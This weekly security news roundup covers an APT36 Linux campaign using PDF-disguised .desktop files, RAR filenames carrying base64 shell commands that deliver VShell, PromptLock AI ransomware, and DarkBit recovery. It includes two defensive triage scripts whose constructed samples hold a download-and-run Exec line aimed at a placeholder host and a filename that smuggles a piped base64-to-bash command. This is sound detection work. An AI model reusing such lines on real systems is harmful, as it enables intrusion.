In this week’s roundup, we highlight Vali Cyber’s addition to the Tidal Cyber Registry, giving security teams MITRE ATT&CK mapping for ESXi defenses. We also cover APT36’s stealthy Linux campaign using PDF-disguised .desktop files, a newly discovered RAR-based malware chain deploying the VShell backdoor, the PromptLock PoC showing how AI can be weaponized for cross-platform ransomware, and Profero’s deep dive into recovering files from a DarkBit attack on ESXi. Read on!
Vali Cyber® Joins the Tidal Cyber Registry: Mapping ZeroLock® to MITRE ATT&CK for ESXi
Vali Cyber has officially joined the Tidal Cyber Registry! ZeroLock maps directly to MITRE ATT&CK for ESXi, giving security teams clear visibility into hypervisor-layer defenses, closing blind spots, and strengthening protection against ransomware at one of the most targeted layers of infrastructure.
"I'm grateful to the Tidal Cyber team for the chance to work alongside them on this! Bringing ZeroLock into Tidal’s Threat-Led Defense will help teams validate controls against real behaviors and protect virtualized environments with confidence."
On Vali Cyber® Joins the Tidal Cyber Registry: Mapping ZeroLock® to MITRE ATT&CK for ESXi
"ESET’s discovery of PromptLock shows that while the mechanics of ransomware—stealing, encrypting, and ransoming data—remain unchanged, the delivery is evolving. By using a local LLM to generate attack scripts on the fly, it strips away the API visibility defenders often rely on, making detection harder. The real shift isn’t in ransomware’s goals, but in how AI is lowering the barrier to innovation for attackers, accelerating an old threat with new tools."
On PromptLock: First AI-Powered Ransomware Emerges
"Phishing campaigns and other forms of end-user trickery remain some of the most popular methods of gaining initial access for motivated attackers. APT36 shows that this is true not only for ransomware gangs and less organized groups, but also for nation-state level threats. Using 'known good' payload delivery methods like Google Drive makes this an even sneakier and more difficult to detect attack."
On Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery
Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery
APT36 is running a stealthy Linux campaign using phishing ZIPs with PDF-disguised .desktop files to target defense entities, delivering payloads via Google Drive and evading detection through icon spoofing and in-memory execution.
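To make the disguise concrete from the defender's side, here is an added triage script; it is not code from the original post, nor from the investigation report it summarises. It parses a .desktop file and reports the traits the summary describes: an application entry whose name or icon claims to be a PDF, and an Exec line that downloads, decodes or stages something at launch. The two sample entries, the placeholder URL and the heuristic patterns are constructed for this example.

```python
"""Triage of .desktop files that present themselves as documents.

Added example; not code from the original post or from the investigation
report it summarises. The sample entries and heuristics are constructed.
"""
import re
from typing import Dict, List

# Heuristics (assumptions, not an exhaustive list): traits that together
# distinguish a disguised launcher from an ordinary application entry.
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b")
SHELL_WRAPPER = re.compile(r"\b(ba)?sh\s+-c\b")
DOCUMENT_ICON = re.compile(r"pdf|document|office", re.IGNORECASE)
DOCUMENT_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)
STAGING_PATHS = re.compile(r"/dev/shm|/tmp/")


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [Desktop Entry] group only."""
    entry: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def triage_desktop_entry(filename: str, text: str) -> List[str]:
    """List the reasons a .desktop file looks like a disguised launcher."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    # The user sees the Name field or the filename without its .desktop
    # suffix, so judge both forms for a document-like appearance.
    shown = filename[: -len(".desktop")] if filename.endswith(".desktop") else filename
    looks_like_document = bool(
        DOCUMENT_NAME.search(shown)
        or DOCUMENT_NAME.search(entry.get("Name", ""))
        or DOCUMENT_ICON.search(entry.get("Icon", ""))
    )
    findings: List[str] = []
    if entry.get("Type") == "Application" and looks_like_document:
        findings.append("application entry presented as a document (name/icon spoofing)")
    if DOWNLOAD_TOOLS.search(exec_line):
        findings.append("Exec downloads content at launch")
    if SHELL_WRAPPER.search(exec_line):
        findings.append("Exec wraps a shell one-liner")
    if "base64" in exec_line:
        findings.append("Exec decodes base64 at launch")
    if STAGING_PATHS.search(exec_line):
        findings.append("Exec stages files in /dev/shm or /tmp")
    return findings


# Constructed samples: a disguised launcher and an ordinary editor entry.
DISGUISED_NAME = "Meeting_Notice.pdf.desktop"
DISGUISED_ENTRY = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s -o /dev/shm/doc https://example.invalid/hosted-file && /dev/shm/doc"
"""
BENIGN_NAME = "editor.desktop"
BENIGN_ENTRY = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""


def triage_samples() -> Dict[str, List[str]]:
    """Run the triage over both constructed samples."""
    return {
        DISGUISED_NAME: triage_desktop_entry(DISGUISED_NAME, DISGUISED_ENTRY),
        BENIGN_NAME: triage_desktop_entry(BENIGN_NAME, BENIGN_ENTRY),
    }


if __name__ == "__main__":
    for name, findings in triage_samples().items():
        print(name, "->", findings or "no findings")
```

Run over the contents of an unpacked phishing ZIP, the script separates entries that merely launch an application from ones that combine a document-like name or icon with a download-and-run Exec line; the presence of several findings together, not any single one, is what warrants a closer look.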
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
A newly uncovered Linux malware campaign uses phishing emails with RAR archive attachments whose filenames embed Base64-encoded shell commands—bypassing antivirus detection and triggering in-memory execution of the VShell backdoor.
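As an added illustration of what a defender can check for here (this is not code from the original post or from the research it summarises), the following script inspects archive member names, which can be obtained with any archive library or a listing tool, for shell command substitution, a pipe into a shell interpreter, or a base64 decode step, and decodes any embedded base64 so an analyst can read the hidden command without ever executing it. The member names, the harmless decoded command and the patterns are constructed for this example.

```python
"""Flag shell commands hidden in archive member names.

Added example; not code from the original post or from the research it
summarises. Sample names and patterns are constructed for illustration.
"""
import base64
import re
from typing import Dict, List

# Patterns (assumptions): ways a filename can carry a command for a script
# that evaluates filenames unquoted.
SUBSTITUTION = re.compile(r"\$\(|`")
PIPE_TO_SHELL = re.compile(r"\|\s*\{?\s*(ba|z|da)?sh\b")
BASE64_DECODE = re.compile(r"base64\s*(-d|--decode)|\{base64,-d\}")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Parentheses are left out: they are common in ordinary filenames.
METACHARS = set("$`|;&{}")


def inspect_member_name(name: str) -> Dict[str, object]:
    """Report why a member name is suspicious and decode embedded base64."""
    reasons: List[str] = []
    if SUBSTITUTION.search(name):
        reasons.append("command substitution in filename")
    if PIPE_TO_SHELL.search(name):
        reasons.append("pipe into a shell interpreter")
    if BASE64_DECODE.search(name):
        reasons.append("base64 decode step in filename")
    stray = sorted(set(name) & METACHARS)
    if stray and not reasons:
        reasons.append("shell metacharacters in filename: " + "".join(stray))
    decoded: List[str] = []
    for blob in BASE64_BLOB.findall(name):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text: skip it
        if text.isprintable():
            decoded.append(text)
    return {"name": name, "suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


def flag_archive_members(names: List[str]) -> List[str]:
    """Return the member names that should be quarantined for review."""
    return [n for n in names if inspect_member_name(n)["suspicious"]]


# Constructed samples. The embedded command decodes to a harmless echo.
SAMPLE_PAYLOAD = base64.b64encode(b"echo detection-sample").decode()
CONSTRUCTED_NAMES = [
    "invoice_2024.pdf",
    "Quarterly Report (final).docx",
    f"report.pdf`$(echo {SAMPLE_PAYLOAD} | base64 -d | bash)`",
]


if __name__ == "__main__":
    for name in CONSTRUCTED_NAMES:
        report = inspect_member_name(name)
        print(report["name"])
        for reason in report["reasons"]:
            print("  -", reason)
        for text in report["decoded"]:
            print("  decoded:", text)
```

The decode step is the useful part for triage: the base64 blob is rendered as text for an analyst to read, while nothing in the filename is ever passed to a shell. The same check applies to any archive format, since the weakness lies in scripts that expand filenames unquoted rather than in RAR itself.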
PromptLock: First AI-Powered Ransomware Emerges
PromptLock, the first proof-of-concept AI-powered ransomware, leverages an open-weight LLM to generate Lua scripts for data theft and encryption across Windows and Linux, showing how AI can be weaponized in ransomware to usher in a new frontier of cyber threats.
From Drone Strike to File Recovery: Outsmarting a Nation State
Different from our usual coverage, but too good not to include! This blog details how Profero’s IR team unraveled a DarkBit ransomware attack on ESXi servers, exploiting flawed encryption and brute-forcing weak AES keys to recover critical files despite the attackers’ silence.